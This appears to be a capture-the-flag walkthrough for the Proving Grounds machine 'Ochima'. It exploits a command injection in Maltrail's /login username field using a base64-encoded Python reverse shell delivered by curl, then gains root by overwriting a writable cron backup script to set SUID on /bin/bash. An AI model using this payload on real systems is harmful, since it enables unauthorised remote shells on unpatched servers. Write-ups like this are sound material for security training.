Ochima - Proving Grounds Practice

Enumeration

Nmap

Initial nmap scan revealed SSH, HTTP and 8338 ports were open.

Web Enumeration

Website at port 8338 was Maltrail 0.52

Exploitation

CVE-2025-34073

An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. This occurs due to unsafe handling of user-supplied input passed to subprocess.check_output() in core/http.py, allowing injection of shell metacharacters. Exploitation does not require authentication and commands are executed with the privileges of the Maltrail process.

I found a CVE for this version. All I need to do is inject a command to username parameter on /login endpoint. At first I set up a payload as seen below.

echo "python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.45.210\",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'" | base64 | tr -d '\n'

echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC40NS4yMTAiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIiknCg==' | base64 -d | sh

And then executed a curl command.

curl 'http://192.168.206.32:8338/login' \
  -X POST \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0' \
  -H 'Accept: text/plain, */*; q=0.01' \
  -H 'Accept-Language: en-US,en;q=0.5' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Origin: http://192.168.206.32:8338' \
  -H 'Connection: keep-alive' \
  -H 'Referer: http://192.168.206.32:8338/' \
  -H 'Priority: u=0' \
  --data-raw "username=;\`echo \"cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC40NS4yMTAiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIiknCg==\" | base64 -d | sh\`"

And I got the user shell.

I read the user flag.

Privilege Escalation

pspy64

I executed pspy64 and found there was a backup script called every minute.

I checked the file and found out I could overwrite it.

So I updated the file to execute chmod +s /bin/bash.

And after waiting a minute I got the root.

---

<

Previous Post

Nickel - Proving Grounds Practice

>

Next Post

Slort - Proving Grounds Practice